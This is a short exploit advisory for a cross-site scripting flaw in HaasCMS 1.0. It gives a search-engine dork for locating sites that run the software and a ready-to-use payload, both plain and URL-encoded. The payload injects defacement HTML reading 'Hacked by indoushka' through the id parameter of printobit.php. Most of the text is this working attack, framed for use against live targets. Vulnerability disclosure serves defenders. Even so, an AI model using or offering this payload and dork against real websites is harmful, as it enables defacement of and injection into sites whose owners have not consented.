Headline
HaasCMS 1.0 Cross Site Scripting
HaasCMS version 1.0 suffers from a cross site scripting vulnerability.
====================================================================================================================================| # Title : HaasCMS v1.0 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) || # Vendor : http://haasit.com/ | | # Dork : Website Design by Haas IT Solutions, Inc. |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /printobit.php?id=437999999.9'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://target_site/printobit.php?id=437999999.9%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================